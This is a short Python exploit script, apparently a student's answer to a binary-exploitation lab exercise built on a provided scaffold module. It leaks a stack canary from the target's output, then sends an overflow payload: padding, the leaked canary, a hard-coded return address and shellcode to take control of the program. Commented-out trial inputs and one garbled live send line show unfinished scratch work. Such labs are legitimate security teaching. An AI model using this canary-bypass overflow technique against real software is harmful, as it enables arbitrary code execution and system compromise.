#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### YOUR CODE STARTS HERE ###

# Program start:
p.start()

# Example send:
# p.send('test\\x41\n')
# p.send('A' * 15 + '\n')
# p.send('A' * 15 + '\\x')
# p.send('A' * 16 + '0')
# p.send('\\x\\x\\x\\x\\x\\x\\x\\x\\x\\x\\x\\x\\x\n')
# p.send('\\x\\x\\x\\x\\x\\x\\x\n')
# p.send('aaa\n')
# p.send('\\xAA\\xAA\\xAA\\xAA\\xAA\\xAA\\xAA\n'
# p.send('\\xAA\\xAA\\xAA\\xAA\\\n\n')
p.send('\\xAA\\xAA\\xAA\\xA\n')
# p.send('AAAA')

# Example receive:
receive = p.recv(8)
canary = receive[4:8]
# assert p.recv(6) == 'testA\n'

p.send('A' * 15 + '\x00' + canary + 'A' * 12 + '\x20\xd7\xff\xff' + SHELLCODE + '\n')

### YOUR CODE ENDS HERE ###
